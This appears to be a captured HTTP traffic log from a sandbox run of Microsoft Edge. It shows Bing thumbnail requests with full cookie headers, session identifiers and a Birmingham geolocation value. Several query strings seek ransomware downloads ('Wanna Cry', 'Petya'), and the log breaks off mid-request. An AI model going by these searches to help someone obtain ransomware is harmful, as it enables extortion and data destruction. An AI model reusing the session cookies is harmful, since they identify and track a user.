GET /th?id=OIP.TTDR-j141HlnF_4uNDXv_gAAAA&w=80&h=80&c=1&vt=10&bgcl=372a20&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1752
x-check-cacheable: YES
cache-control: public, max-age=2292853
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5120c
GET

https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2694
x-check-cacheable: YES
cache-control: public, max-age=5184000
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51243
GET

https://th.bing.com/th?id=OVP.sfroPIfym8AOhQ_c7OcomgHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OVP.sfroPIfym8AOhQ_c7OcomgHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1390
cache-control: public, max-age=1209600
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51212
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Wanna+Cry+Download+Link&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?q=Wanna+Cry+Download+Link&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3111
cache-control: public, max-age=3172833
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51242
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Ransomware+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?q=Ransomware+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3111
x-check-cacheable: YES
cache-control: public, max-age=3172906
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51244
GET

https://th.bing.com/th?q=Wanna+Cry+Virus+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?q=Wanna+Cry+Virus+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2599
x-check-cacheable: YES
cache-control: public, max-age=3427081
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51251
GET

https://th.bing.com/th?q=Petya+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?q=Petya+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
